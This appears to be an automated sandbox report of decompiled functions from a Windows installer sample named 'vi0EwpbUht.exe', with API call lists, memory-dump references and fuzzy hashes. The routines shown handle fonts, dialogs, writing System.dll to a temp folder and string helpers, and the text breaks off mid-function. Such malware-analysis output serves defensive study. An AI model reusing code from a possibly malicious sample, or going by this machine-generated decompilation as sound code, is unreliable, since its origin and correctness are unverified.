                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 67%
                                                                                                                          			E00401D1B() {
                                                                                                                          				void* __esi;
                                                                                                                          				int _t6;
                                                                                                                          				signed char _t11;
                                                                                                                          				struct HFONT__* _t14;
                                                                                                                          				void* _t18;
                                                                                                                          				void* _t24;
                                                                                                                          				void* _t26;
                                                                                                                          				void* _t28;
                                                                                                                          
                                                                                                                          				_t6 = GetDeviceCaps(GetDC( *(_t28 - 0x34)), 0x5a);
                                                                                                                          				0x40af54->lfHeight =  ~(MulDiv(E004029D9(2), _t6, 0x48));
                                                                                                                          				 *0x40af64 = E004029D9(3);
                                                                                                                          				_t11 =  *((intOrPtr*)(_t28 - 0x14));
                                                                                                                          				 *0x40af6b = 1;
                                                                                                                          				 *0x40af68 = _t11 & 0x00000001;
                                                                                                                          				 *0x40af69 = _t11 & 0x00000002;
                                                                                                                          				 *0x40af6a = _t11 & 0x00000004;
                                                                                                                          				E004059FF(_t18, _t24, _t26, 0x40af70,  *((intOrPtr*)(_t28 - 0x20)));
                                                                                                                          				_t14 = CreateFontIndirectA(0x40af54);
                                                                                                                          				_push(_t14);
                                                                                                                          				_push(_t26);
                                                                                                                          				E0040593B();
                                                                                                                          				 *0x423f08 =  *0x423f08 +  *((intOrPtr*)(_t28 - 4));
                                                                                                                          				return 0;
                                                                                                                          			}












                                                                                                                          APIs
                                                                                                                          • GetDC.USER32(?), ref: 00401D22
                                                                                                                          • GetDeviceCaps.GDI32(00000000), ref: 00401D29
                                                                                                                          • MulDiv.KERNEL32(00000000,00000002,00000000), ref: 00401D38
                                                                                                                          • CreateFontIndirectA.GDI32(0040AF54), ref: 00401D8A
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000002.00000002.335736473.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000002.00000002.335724114.0000000000400000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000002.00000002.335749978.0000000000407000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000002.00000002.335758150.0000000000409000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000002.00000002.335774251.0000000000422000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000002.00000002.335781240.0000000000429000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000002.00000002.335787934.000000000042C000.00000002.00020000.sdmp
                                                                                                                          Similarity
                                                                                                                          • API ID: CapsCreateDeviceFontIndirect
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3272661963-0
                                                                                                                          • Opcode ID: 78f79da71c4801185515a33ee10eecec6988933ac577fdebba6a0d8b1e27de8a
                                                                                                                          • Instruction ID: 822a585a95499be2ccb46a886614a983d19f7779af01092212c1c8a44adbdb5d
                                                                                                                          • Opcode Fuzzy Hash: 78f79da71c4801185515a33ee10eecec6988933ac577fdebba6a0d8b1e27de8a
                                                                                                                          • Instruction Fuzzy Hash: 80F04FF1A49742AEE70167B0AE0AB9A3B659719306F14043AF242BA1E2C5BC0454DB7F
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 100%
                                                                                                                          			E00402BBE(intOrPtr _a4) {
                                                                                                                          				long _t2;
                                                                                                                          				struct HWND__* _t3;
                                                                                                                          				struct HWND__* _t6;
                                                                                                                          
                                                                                                                          				if(_a4 == 0) {
                                                                                                                          					__eflags =  *0x417020; // 0x0
                                                                                                                          					if(__eflags == 0) {
                                                                                                                          						_t2 = GetTickCount();
                                                                                                                          						__eflags = _t2 -  *0x423e8c;
                                                                                                                          						if(_t2 >  *0x423e8c) {
                                                                                                                          							_t3 = CreateDialogParamA( *0x423e80, 0x6f, 0, E00402B3B, 0);
                                                                                                                          							 *0x417020 = _t3;
                                                                                                                          							return ShowWindow(_t3, 5);
                                                                                                                          						}
                                                                                                                          						return _t2;
                                                                                                                          					} else {
                                                                                                                          						return E00405D38(0);
                                                                                                                          					}
                                                                                                                          				} else {
                                                                                                                          					_t6 =  *0x417020; // 0x0
                                                                                                                          					if(_t6 != 0) {
                                                                                                                          						_t6 = DestroyWindow(_t6);
                                                                                                                          					}
                                                                                                                          					 *0x417020 = 0;
                                                                                                                          					return _t6;
                                                                                                                          				}
                                                                                                                          			}







                                                                                                                          APIs
                                                                                                                          • DestroyWindow.USER32(00000000,00000000,00402D9E,00000001), ref: 00402BD1
                                                                                                                          • GetTickCount.KERNEL32 ref: 00402BEF
                                                                                                                          • CreateDialogParamA.USER32(0000006F,00000000,00402B3B,00000000), ref: 00402C0C
                                                                                                                          • ShowWindow.USER32(00000000,00000005), ref: 00402C1A
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000002.00000002.335736473.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000002.00000002.335724114.0000000000400000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000002.00000002.335749978.0000000000407000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000002.00000002.335758150.0000000000409000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000002.00000002.335774251.0000000000422000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000002.00000002.335781240.0000000000429000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000002.00000002.335787934.000000000042C000.00000002.00020000.sdmp
                                                                                                                          Similarity
                                                                                                                          • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2102729457-0
                                                                                                                          • Opcode ID: bf07767b331bb76d3b5a2f8e5622a218379b171e4cdb58aec93dcc8b8375aee9
                                                                                                                          • Instruction ID: f2d052a30a3472248e345e5832336eca953f0b1533712f6c56216133e551431f
                                                                                                                          • Opcode Fuzzy Hash: bf07767b331bb76d3b5a2f8e5622a218379b171e4cdb58aec93dcc8b8375aee9
                                                                                                                          • Instruction Fuzzy Hash: 2AF0DA31D09320ABC661AF14FD4CADB7B75BB09B127014936F101B52E8D77868818BAD
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 100%
                                                                                                                          			E00404CCB(struct HWND__* _a4, int _a8, int _a12, long _a16) {
                                                                                                                          				long _t22;
                                                                                                                          
                                                                                                                          				if(_a8 != 0x102) {
                                                                                                                          					if(_a8 != 0x200) {
                                                                                                                          						_t22 = _a16;
                                                                                                                          						L7:
                                                                                                                          						if(_a8 == 0x419 &&  *0x420460 != _t22) {
                                                                                                                          							 *0x420460 = _t22;
                                                                                                                          							E004059DD(0x420478, 0x424000);
                                                                                                                          							E0040593B(0x424000, _t22);
                                                                                                                          							E0040140B(6);
                                                                                                                          							E004059DD(0x424000, 0x420478);
                                                                                                                          						}
                                                                                                                          						L11:
                                                                                                                          						return CallWindowProcA( *0x420468, _a4, _a8, _a12, _t22);
                                                                                                                          					}
                                                                                                                          					if(IsWindowVisible(_a4) == 0) {
                                                                                                                          						L10:
                                                                                                                          						_t22 = _a16;
                                                                                                                          						goto L11;
                                                                                                                          					}
                                                                                                                          					_t22 = E0040464A(_a4, 1);
                                                                                                                          					_a8 = 0x419;
                                                                                                                          					goto L7;
                                                                                                                          				}
                                                                                                                          				if(_a12 != 0x20) {
                                                                                                                          					goto L10;
                                                                                                                          				}
                                                                                                                          				E00403DDB(0x413);
                                                                                                                          				return 0;
                                                                                                                          			}





                                                                                                                          APIs
                                                                                                                          • IsWindowVisible.USER32(?), ref: 00404D01
                                                                                                                          • CallWindowProcA.USER32 ref: 00404D6F
                                                                                                                            • Part of subcall function 00403DDB: SendMessageA.USER32(00000000,00000000,00000000,00000000), ref: 00403DED
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000002.00000002.335736473.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000002.00000002.335724114.0000000000400000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000002.00000002.335749978.0000000000407000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000002.00000002.335758150.0000000000409000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000002.00000002.335774251.0000000000422000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000002.00000002.335781240.0000000000429000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000002.00000002.335787934.000000000042C000.00000002.00020000.sdmp
                                                                                                                          Similarity
                                                                                                                          • API ID: Window$CallMessageProcSendVisible
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3748168415-3916222277
                                                                                                                          • Opcode ID: 7ef91977e0255b1fc34b6530065b048aeb6426da5fc65d298478046c2303bded
                                                                                                                          • Instruction ID: 2250b5ae86c5db7695da18b81197a994f129f58ca555af08ca8730d1192fac1c
                                                                                                                          • Opcode Fuzzy Hash: 7ef91977e0255b1fc34b6530065b048aeb6426da5fc65d298478046c2303bded
                                                                                                                          • Instruction Fuzzy Hash: 5A118CB1600208BBDF217F629C4099B3B69EF84765F00813BFB14392A2C77C8951CFA9
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 100%
                                                                                                                          			E004024BE(struct _OVERLAPPED* __ebx, intOrPtr* __esi) {
                                                                                                                          				int _t5;
                                                                                                                          				long _t7;
                                                                                                                          				struct _OVERLAPPED* _t11;
                                                                                                                          				intOrPtr* _t15;
                                                                                                                          				void* _t17;
                                                                                                                          				int _t21;
                                                                                                                          
                                                                                                                          				_t15 = __esi;
                                                                                                                          				_t11 = __ebx;
                                                                                                                          				if( *((intOrPtr*)(_t17 - 0x1c)) == __ebx) {
                                                                                                                          					_t7 = lstrlenA(E004029F6(0x11));
                                                                                                                          				} else {
                                                                                                                          					E004029D9(1);
                                                                                                                          					 *0x409f50 = __al;
                                                                                                                          				}
                                                                                                                          				if( *_t15 == _t11) {
                                                                                                                          					L8:
                                                                                                                          					 *((intOrPtr*)(_t17 - 4)) = 1;
                                                                                                                          				} else {
                                                                                                                          					_t5 = WriteFile(E00405954(_t17 + 8, _t15), "C:\Users\engineer\AppData\Local\Temp\nse728B.tmp\System.dll", _t7, _t17 + 8, _t11);
                                                                                                                          					_t21 = _t5;
                                                                                                                          					if(_t21 == 0) {
                                                                                                                          						goto L8;
                                                                                                                          					}
                                                                                                                          				}
                                                                                                                          				 *0x423f08 =  *0x423f08 +  *((intOrPtr*)(_t17 - 4));
                                                                                                                          				return 0;
                                                                                                                          			}










                                                                                                                          APIs
                                                                                                                          • lstrlenA.KERNEL32(00000000,00000011), ref: 004024DC
                                                                                                                          • WriteFile.KERNEL32(00000000,?,C:\Users\user\AppData\Local\Temp\nse728B.tmp\System.dll,00000000,?,?,00000000,00000011), ref: 004024FB
                                                                                                                          Strings
                                                                                                                          • C:\Users\user\AppData\Local\Temp\nse728B.tmp\System.dll, xrefs: 004024CA, 004024EF
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000002.00000002.335736473.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000002.00000002.335724114.0000000000400000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000002.00000002.335749978.0000000000407000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000002.00000002.335758150.0000000000409000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000002.00000002.335774251.0000000000422000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000002.00000002.335781240.0000000000429000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000002.00000002.335787934.000000000042C000.00000002.00020000.sdmp
                                                                                                                          Similarity
                                                                                                                          • API ID: FileWritelstrlen
                                                                                                                          • String ID: C:\Users\user\AppData\Local\Temp\nse728B.tmp\System.dll
                                                                                                                          • API String ID: 427699356-554494925
                                                                                                                          • Opcode ID: df474f2c717a3cfcee664a55503633412dfe168159680f8467c13f76ba73a4c8
                                                                                                                          • Instruction ID: 28baf68bc3b2ef7cd727d17ca875bc327529d04ff6cae4c8aacaeccaaba980a4
                                                                                                                          • Opcode Fuzzy Hash: df474f2c717a3cfcee664a55503633412dfe168159680f8467c13f76ba73a4c8
                                                                                                                          • Instruction Fuzzy Hash: 5AF0B4B2A04241FBDB40BBA09E49AAE37689B00348F10443BA206F51C2D6BC4982A76D
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 50%
                                                                                                                          			E00404E4D(signed int __eax) {
                                                                                                                          				intOrPtr _v0;
                                                                                                                          				intOrPtr _t8;
                                                                                                                          				intOrPtr _t10;
                                                                                                                          				intOrPtr _t11;
                                                                                                                          				intOrPtr* _t12;
                                                                                                                          
                                                                                                                          				_t11 =  *0x423ea8; // 0x486a5c
                                                                                                                          				_t10 =  *0x423eac; // 0x1
                                                                                                                          				__imp__OleInitialize(0);
                                                                                                                          				 *0x423f38 =  *0x423f38 | __eax;
                                                                                                                          				E00403DDB(0);
                                                                                                                          				if(_t10 != 0) {
                                                                                                                          					_t12 = _t11 + 0xc;
                                                                                                                          					while(1) {
                                                                                                                          						_t10 = _t10 - 1;
                                                                                                                          						if(( *(_t12 - 4) & 0x00000001) != 0 && E00401389( *_t12, _v0) != 0) {
                                                                                                                          							break;
                                                                                                                          						}
                                                                                                                          						_t12 = _t12 + 0x418;
                                                                                                                          						if(_t10 != 0) {
                                                                                                                          							continue;
                                                                                                                          						} else {
                                                                                                                          						}
                                                                                                                          						goto L7;
                                                                                                                          					}
                                                                                                                          					 *0x423f0c =  *0x423f0c + 1;
                                                                                                                          				}
                                                                                                                          				L7:
                                                                                                                          				E00403DDB(0x404);
                                                                                                                          				__imp__OleUninitialize();
                                                                                                                          				_t8 =  *0x423f0c; // 0x0
                                                                                                                          				return _t8;
                                                                                                                          			}









                                                                                                                          APIs
                                                                                                                          • OleInitialize.OLE32(00000000), ref: 00404E5D
                                                                                                                            • Part of subcall function 00403DDB: SendMessageA.USER32(00000000,00000000,00000000,00000000), ref: 00403DED
                                                                                                                          • OleUninitialize.OLE32(00000404,00000000), ref: 00404EA9
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000002.00000002.335736473.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000002.00000002.335724114.0000000000400000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000002.00000002.335749978.0000000000407000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000002.00000002.335758150.0000000000409000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000002.00000002.335774251.0000000000422000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000002.00000002.335781240.0000000000429000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000002.00000002.335787934.000000000042C000.00000002.00020000.sdmp
                                                                                                                          Similarity
                                                                                                                          • API ID: InitializeMessageSendUninitialize
                                                                                                                          • String ID: \jH
                                                                                                                          • API String ID: 2896919175-2113029193
                                                                                                                          • Opcode ID: a71bf3315524e495bb63ac7db680478635d871b9932b013c5ee158b9648a44a1
                                                                                                                          • Instruction ID: dd00d1d9fa511fdb2abfd92f861b37bc179417f7df103cd37a6f8771cbc5aef0
                                                                                                                          • Opcode Fuzzy Hash: a71bf3315524e495bb63ac7db680478635d871b9932b013c5ee158b9648a44a1
                                                                                                                          • Instruction Fuzzy Hash: D3F0F0B2A00200AAD7201F64ED00B167BB4ABC0316F06003BFF04B62E0D3795802869D
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 100%
                                                                                                                          			E00403491() {
                                                                                                                          				void* _t2;
                                                                                                                          				void* _t3;
                                                                                                                          				void* _t6;
                                                                                                                          				void* _t8;
                                                                                                                          
                                                                                                                          				_t8 =  *0x41f434;
                                                                                                                          				_t3 = E00403476(_t2, 0);
                                                                                                                          				if(_t8 != 0) {
                                                                                                                          					do {
                                                                                                                          						_t6 = _t8;
                                                                                                                          						_t8 =  *_t8;
                                                                                                                          						FreeLibrary( *(_t6 + 8));
                                                                                                                          						_t3 = GlobalFree(_t6);
                                                                                                                          					} while (_t8 != 0);
                                                                                                                          				}
                                                                                                                          				 *0x41f434 =  *0x41f434 & 0x00000000;
                                                                                                                          				return _t3;
                                                                                                                          			}








                                                                                                                          APIs
                                                                                                                          • FreeLibrary.KERNEL32(?,"C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe" ,00000000,00000000,00403469,004032BC,00000000), ref: 004034AB
                                                                                                                          • GlobalFree.KERNEL32 ref: 004034B2
                                                                                                                          Strings
                                                                                                                          • "C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe" , xrefs: 004034A3
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000002.00000002.335736473.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000002.00000002.335724114.0000000000400000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000002.00000002.335749978.0000000000407000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000002.00000002.335758150.0000000000409000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000002.00000002.335774251.0000000000422000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000002.00000002.335781240.0000000000429000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000002.00000002.335787934.000000000042C000.00000002.00020000.sdmp
                                                                                                                          Similarity
                                                                                                                          • API ID: Free$GlobalLibrary
                                                                                                                          • String ID: "C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe"
                                                                                                                          • API String ID: 1100898210-2478495835
                                                                                                                          • Opcode ID: 3e2f1a94e1730b0e2f77525ddf4d06804517b8e77a23c02aa7cd98468957b701
                                                                                                                          • Instruction ID: 7bfc0464e02b508f879d35a29cae48101a6ab00b4f5f00e512934bdeb57274a8
                                                                                                                          • Opcode Fuzzy Hash: 3e2f1a94e1730b0e2f77525ddf4d06804517b8e77a23c02aa7cd98468957b701
                                                                                                                          • Instruction Fuzzy Hash: FBE08C3280653097C7221F05AE04B9AB66C6F94B22F068076E8407B3A1C3782C428AD8
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 100%
                                                                                                                          			E00405517(char* _a4) {
                                                                                                                          				char* _t3;
                                                                                                                          				char* _t5;
                                                                                                                          
                                                                                                                          				_t5 = _a4;
                                                                                                                          				_t3 =  &(_t5[lstrlenA(_t5)]);
                                                                                                                          				while( *_t3 != 0x5c) {
                                                                                                                          					_t3 = CharPrevA(_t5, _t3);
                                                                                                                          					if(_t3 > _t5) {
                                                                                                                          						continue;
                                                                                                                          					}
                                                                                                                          					break;
                                                                                                                          				}
                                                                                                                          				 *_t3 =  *_t3 & 0x00000000;
                                                                                                                          				return  &(_t3[1]);
                                                                                                                          			}






                                                                                                                          APIs
                                                                                                                          • lstrlenA.KERNEL32(80000000,C:\Users\user\AppData\Local\Temp\3582-490,00402C8E,C:\Users\user\AppData\Local\Temp\3582-490,C:\Users\user\AppData\Local\Temp\3582-490,C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe,C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe,80000000,00000003), ref: 0040551D
                                                                                                                          • CharPrevA.USER32(80000000,00000000,80000000,C:\Users\user\AppData\Local\Temp\3582-490,00402C8E,C:\Users\user\AppData\Local\Temp\3582-490,C:\Users\user\AppData\Local\Temp\3582-490,C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe,C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe,80000000,00000003), ref: 0040552B
                                                                                                                          Strings
                                                                                                                          • C:\Users\user\AppData\Local\Temp\3582-490, xrefs: 00405517
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000002.00000002.335736473.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000002.00000002.335724114.0000000000400000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000002.00000002.335749978.0000000000407000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000002.00000002.335758150.0000000000409000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000002.00000002.335774251.0000000000422000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000002.00000002.335781240.0000000000429000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000002.00000002.335787934.000000000042C000.00000002.00020000.sdmp
                                                                                                                          Similarity
                                                                                                                          • API ID: CharPrevlstrlen
                                                                                                                          • String ID: C:\Users\user\AppData\Local\Temp\3582-490
                                                                                                                          • API String ID: 2709904686-4085912586
                                                                                                                          • Opcode ID: 49376fbf8c9c30057c1bc985cc011eea510fd351d3a644e674ee9e82abf7fe19
                                                                                                                          • Instruction ID: 1341b21386aa9ee456471dc2eb10899dbff8c866770b3e7d35d8712ddbbc4649
                                                                                                                          • Opcode Fuzzy Hash: 49376fbf8c9c30057c1bc985cc011eea510fd351d3a644e674ee9e82abf7fe19
                                                                                                                          • Instruction Fuzzy Hash: D9D0C7B2509DB06EE7035614DC04B9F7B89DF17710F1944A2E540A61D5D27C5D418BFD
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 100%
                                                                                                                          			E100010D6(void* _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
                                                                                                                          				char* _t17;
                                                                                                                          				char _t19;
                                                                                                                          				void* _t20;
                                                                                                                          				void* _t24;
                                                                                                                          				void* _t27;
                                                                                                                          				void* _t31;
                                                                                                                          				void* _t37;
                                                                                                                          				void* _t39;
                                                                                                                          				void* _t40;
                                                                                                                          				signed int _t43;
                                                                                                                          				void* _t52;
                                                                                                                          				char* _t53;
                                                                                                                          				char* _t55;
                                                                                                                          				void* _t56;
                                                                                                                          				void* _t58;
                                                                                                                          
                                                                                                                          				 *0x10004058 = _a8;
                                                                                                                          				 *0x1000405c = _a16;
                                                                                                                          				 *0x10004060 = _a12;
                                                                                                                          				 *((intOrPtr*)(_a20 + 0xc))( *0x10004038, E1000189E, _t52);
                                                                                                                          				_t43 =  *0x10004058 +  *0x10004058 * 4 << 2;
                                                                                                                          				_t17 = E10001561();
                                                                                                                          				_a8 = _t17;
                                                                                                                          				_t53 = _t17;
                                                                                                                          				if( *_t17 == 0) {
                                                                                                                          					L16:
                                                                                                                          					return GlobalFree(_a8);
                                                                                                                          				} else {
                                                                                                                          					do {
                                                                                                                          						_t19 =  *_t53;
                                                                                                                          						_t55 = _t53 + 1;
                                                                                                                          						_t58 = _t19 - 0x6c;
                                                                                                                          						if(_t58 > 0) {
                                                                                                                          							_t20 = _t19 - 0x70;
                                                                                                                          							if(_t20 == 0) {
                                                                                                                          								L12:
                                                                                                                          								_t53 = _t55 + 1;
                                                                                                                          								_t24 = E1000159E(E100015E5( *_t55 - 0x30));
                                                                                                                          								L13:
                                                                                                                          								GlobalFree(_t24);
                                                                                                                          								goto L14;
                                                                                                                          							}
                                                                                                                          							_t27 = _t20;
                                                                                                                          							if(_t27 == 0) {
                                                                                                                          								L10:
                                                                                                                          								_t53 = _t55 + 1;
                                                                                                                          								_t24 = E1000160E( *_t55 - 0x30, E10001561());
                                                                                                                          								goto L13;
                                                                                                                          							}
                                                                                                                          							L7:
                                                                                                                          							if(_t27 == 1) {
                                                                                                                          								_t31 = GlobalAlloc(0x40, _t43 + 4);
                                                                                                                          								 *_t31 =  *0x10004030;
                                                                                                                          								 *0x10004030 = _t31;
                                                                                                                          								E10001854(_t31 + 4,  *0x10004060, _t43);
                                                                                                                          								_t56 = _t56 + 0xc;
                                                                                                                          							}
                                                                                                                          							goto L14;
                                                                                                                          						}
                                                                                                                          						if(_t58 == 0) {
                                                                                                                          							L17:
                                                                                                                          							_t34 =  *0x10004030;
                                                                                                                          							if( *0x10004030 != 0) {
                                                                                                                          								E10001854( *0x10004060, _t34 + 4, _t43);
                                                                                                                          								_t37 =  *0x10004030;
                                                                                                                          								_t56 = _t56 + 0xc;
                                                                                                                          								GlobalFree(_t37);
                                                                                                                          								 *0x10004030 =  *_t37;
                                                                                                                          							}
                                                                                                                          							goto L14;
                                                                                                                          						}
                                                                                                                          						_t39 = _t19 - 0x4c;
                                                                                                                          						if(_t39 == 0) {
                                                                                                                          							goto L17;
                                                                                                                          						}
                                                                                                                          						_t40 = _t39 - 4;
                                                                                                                          						if(_t40 == 0) {
                                                                                                                          							 *_t55 =  *_t55 + 0xa;
                                                                                                                          							goto L12;
                                                                                                                          						}
                                                                                                                          						_t27 = _t40;
                                                                                                                          						if(_t27 == 0) {
                                                                                                                          							 *_t55 =  *_t55 + 0xa;
                                                                                                                          							goto L10;
                                                                                                                          						}
                                                                                                                          						goto L7;
                                                                                                                          						L14:
                                                                                                                          					} while ( *_t53 != 0);
                                                                                                                          					goto L16;
                                                                                                                          				}
                                                                                                                          			}

                                                                                                                          APIs
                                                                                                                            • Part of subcall function 10001561: lstrcpyA.KERNEL32(00000000,?,?,?,10001804,?,10001017), ref: 1000157E
                                                                                                                            • Part of subcall function 10001561: GlobalFree.KERNEL32 ref: 1000158F
                                                                                                                          • GlobalAlloc.KERNEL32(00000040,?), ref: 10001151
                                                                                                                          • GlobalFree.KERNEL32 ref: 100011AA
                                                                                                                          • GlobalFree.KERNEL32 ref: 100011BD
                                                                                                                          • GlobalFree.KERNEL32 ref: 100011EB
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000002.00000002.337430862.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                          • Associated: 00000002.00000002.337412850.0000000010000000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000002.00000002.337450406.0000000010003000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000002.00000002.337467323.0000000010005000.00000002.00020000.sdmp
                                                                                                                          Similarity
                                                                                                                          • API ID: Global$Free$Alloclstrcpy
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 852173138-0
                                                                                                                          • Opcode ID: 63b0637edc7530645d46bec010932f639f2f746b6ed29226dfb72de0ebfb049a
                                                                                                                          • Instruction ID: ed341c900a7ce6bdf815d06216e218db22d2bbb6d3afa64795f6a6593979f754
                                                                                                                          • Opcode Fuzzy Hash: 63b0637edc7530645d46bec010932f639f2f746b6ed29226dfb72de0ebfb049a
                                                                                                                          • Instruction Fuzzy Hash: D031BCB5404655AFF705CF64DCC9BEA7FFCEB092D1B164029FA45D626CEB3099008B64
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 100%
                                                                                                                          			E00405629(CHAR* _a4, CHAR* _a8) {
                                                                                                                          				int _t10;
                                                                                                                          				int _t15;
                                                                                                                          				CHAR* _t16;
                                                                                                                          
                                                                                                                          				_t15 = lstrlenA(_a8);
                                                                                                                          				_t16 = _a4;
                                                                                                                          				while(lstrlenA(_t16) >= _t15) {
                                                                                                                          					 *(_t15 + _t16) =  *(_t15 + _t16) & 0x00000000;
                                                                                                                          					_t10 = lstrcmpiA(_t16, _a8);
                                                                                                                          					if(_t10 == 0) {
                                                                                                                          						return _t16;
                                                                                                                          					}
                                                                                                                          					_t16 = CharNextA(_t16);
                                                                                                                          				}
                                                                                                                          				return 0;
                                                                                                                          			}







                                                                                                                          APIs
                                                                                                                          • lstrlenA.KERNEL32(00000000,?,00000000,00000000,00405837,00000000,[Rename],?,?,00000000,000000F1,?), ref: 00405630
                                                                                                                          • lstrcmpiA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00000000,00405837,00000000,[Rename],?,?,00000000,000000F1,?), ref: 00405649
                                                                                                                          • CharNextA.USER32(00000000,?,?,00000000,000000F1,?), ref: 00405657
                                                                                                                          • lstrlenA.KERNEL32(00000000,00000000,?,00000000,00000000,00405837,00000000,[Rename],?,?,00000000,000000F1,?), ref: 00405660
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000002.00000002.335736473.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000002.00000002.335724114.0000000000400000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000002.00000002.335749978.0000000000407000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000002.00000002.335758150.0000000000409000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000002.00000002.335774251.0000000000422000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000002.00000002.335781240.0000000000429000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000002.00000002.335787934.000000000042C000.00000002.00020000.sdmp
                                                                                                                          Similarity
                                                                                                                          • API ID: lstrlen$CharNextlstrcmpi
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 190613189-0
                                                                                                                          • Opcode ID: 0108cf067d6f6d80c8ed850288af8a4b3b9133f156f8bdff26d83f0dd252fb59
                                                                                                                          • Instruction ID: 25fbcb832c33ec4964fd827efed06e6d871dcd69bbe6b28132c6debe6a032c6a
                                                                                                                          • Opcode Fuzzy Hash: 0108cf067d6f6d80c8ed850288af8a4b3b9133f156f8bdff26d83f0dd252fb59
                                                                                                                          • Instruction Fuzzy Hash: 02F0A736249D51DBC2025B355C04E6FAA94EF92354B54097AF444F2251D33A98129BBF
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Executed Functions

                                                                                                                          C-Code - Quality: 21%
                                                                                                                          			E00419FCB(intOrPtr _a4, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, char _a32, intOrPtr _a36, intOrPtr _a40) {
                                                                                                                          				void* _t18;
